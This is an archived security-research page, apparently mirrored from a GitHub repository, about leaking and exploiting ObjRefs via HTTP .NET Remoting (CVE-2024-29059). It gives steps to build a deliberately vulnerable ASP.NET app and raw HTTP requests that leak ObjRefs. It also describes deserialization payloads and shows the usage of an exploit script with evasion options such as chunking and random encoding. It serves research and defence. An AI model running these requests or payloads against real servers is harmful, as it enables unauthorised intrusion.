关联漏洞
标题:Microsoft .NET Framework 安全漏洞 (CVE-2024-29059)Description:Microsoft .NET Framework是美国微软(Microsoft)公司的一种全面且一致的编程模型,也是一个用于构建Windows、Windows Store、Windows Phone、Windows Server和Microsoft Azure的应用程序的开发平台。该平台包括C#和Visual Basic编程语言、公共语言运行库和广泛的类库。 Microsoft .NET Framework存在安全漏洞。攻击者利用该漏洞可以获取敏感信息。
Description
Additional resources for leaking and exploiting ObjRefs via HTTP .NET Remoting (CVE-2024-29059)
介绍
# Leaking and Exploiting `ObjRef`s via HTTP .NET Remoting (CVE-2024-29059)
This repository provides further details and resources on the [CODE WHITE blog post of the same name *Leaking ObjRefs to Exploit HTTP .NET Remoting*](https://code-white.com/blog/leaking-objrefs-to-exploit-http-dotnet-remoting/):
1. Creating a vulnerable ASP.NET web application
2. Detecting `ObjRef` leaks
3. Example deserialization payloads that work under the `TypeFilterLevel.Low` restrictions
4. Exploit script for delivering the payloads
## 1. Creating a Vulnerable ASP.NET Web Application
The following is based on [*Configure Application Insights for your ASP.NET website* by Microsoft](https://learn.microsoft.com/en-us/azure/azure-monitor/app/asp-net) and describes how to create a vulnerable ASP.NET web application with Visual Studio 2019 (required to target .NET Framework 4.5.2, you can still download it at <https://aka.ms/vs/16/release/vs_community.exe>) and Microsoft Application Insights:
1. Open Visual Studio 2019.
2. Select **File** > **New** > **Project**.
3. Select **ASP.NET Web Application (.NET Framework) C#**, then **Next**.
4. Select **.NET Framework 4.5.2**, then **Create**.
5. Select **Empty**, then **Create**.
6. Select **Project** > **Add Application Insights Telemetry**.
7. Select **Application Insights SDK (local)**, then **Next**.
8. Check **NuGet packages**, then click **Finish**.
If the .NET Framework updates of January 2024 are installed, open the `Web.config` file and add the following under [`/configuration/appSettings`](https://learn.microsoft.com/en-us/dotnet/framework/configure-apps/file-schema/appsettings/appsettings-element-for-configuration) to re-enable the vulnerable behavior:
```xml
<add key="microsoft:Remoting:LateHttpHeaderParsing" value="true" />
```
You can then run the web application via **Debug** > **Start Without Debugging** or by pressing Ctrl+F5.
## 2. Detecting `ObjRef` Leaks
You can use the following requests to leak `ObjRef`s of `MarshalByRefObject` instances stored in the `LogicalCallContext`:
- `BinaryServerFormatterSink`:
```
GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.0
__RequestVerb: POST
Content-Type: application/octet-stream
```
- `SoapServerFormatterSink`:
```
GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.0
__RequestVerb: POST
Content-Type: text/xml
```
Leaked `ObjRef` URIs can then be matched using the following regex:
```
/[0-9a-f_]+/[0-9A-Za-z_+]+_\d+\.rem
```
## 3. Example Deserialization Payloads
We have created two simple deserialization payloads based on the [*TextFormattingRunProperties* gadget of YSoSerial.Net](https://github.com/pwntester/ysoserial.net/blob/master/ysoserial/Generators/TextFormattingRunPropertiesGenerator.cs) with custom XAML payloads that work under the restrictions caused by `TypeFilterLevel.Low` to perform the following:
- `HttpContext.Current.Response.AddHeader("Set-Cookie", "x=ad92afb4-00c3-4479-bab8-2425b5716081")`
- `HttpContext.Current.Response.RedirectLocation = "/ad92afb4-00c3-4479-bab8-2425b5716081"`
The HTTP headers can be observed in the server's response to the HTTP .NET Remoting request.
## 4. Exploit Script
The `RemoteApplicationMetadata.py` script provides a way for leaking existing `ObjRef` and then using it in a subsequent request to deliver a given payload:
```
usage: RemoteApplicationMetadata.py [-h] [-c] [--chunk-range CHUNK_RANGE] [-e] [-f {binary,soap}] [-u] [-v] url [file]
positional arguments:
url target URL (without `RemoteApplicationMetadata.rem`)
file BinaryFormatter/SoapFormatter payload file (default: stdin)
options:
-h, --help show this help message and exit
-c, --chunked use chunked Transfer-Encoding for request
--chunk-range CHUNK_RANGE
range to pick the chunk size from randomly, e. g., 1-10
-e, --encoding apply a random non ASCII-based encoding on SOAP
-f {binary,soap}, --format {binary,soap}
targeted runtime serializer format (default: soap)
-u, --use-generic-uri
use the generic `RemoteApplicationMetadata.rem` also for the payload delivery request
-v, --verbose print verbose info
```
Example:
```
./RemoteApplicationMetadata.py -f binary https://127.0.0.1:44365 AddHeader.bin -u -v
```
文件快照
[4.0K] /data/pocs/29581f8c3cfcdc909c177b4633233d3d491eb52c
├── [ 749] DISCLAIMER.md
├── [1.0K] LICENSE
├── [4.0K] Payloads
│ ├── [1.0K] AddHeader.binary
│ ├── [1.7K] AddHeader.soap
│ ├── [1.0K] RedirectLocation.binary
│ └── [1.6K] RedirectLocation.soap
├── [4.3K] README.md
├── [4.0K] RemoteApplicationMetadata.py
└── [4.0K] WebApplication452
├── [8.7K] ApplicationInsights.config
├── [4.0K] bin
│ └── [8.7K] ApplicationInsights.config
├── [4.0K] obj
│ └── [4.0K] Debug
│ ├── [ 17K] DesignTimeResolveAssemblyReferencesInput.cache
│ └── [ 0] WebApplication452.csproj.FileListAbsolute.txt
├── [1.3K] packages.config
├── [4.0K] Properties
│ ├── [1.3K] AssemblyInfo.cs
│ ├── [ 83] serviceDependencies.json
│ ├── [ 87] serviceDependencies.local.json
│ └── [ 151] serviceDependencies.local.json.user
├── [ 13K] WebApplication452.csproj
├── [1.4K] WebApplication452.csproj.user
├── [2.6K] Web.config
├── [1.2K] Web.Debug.config
└── [1.3K] Web.Release.config
6 directories, 22 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。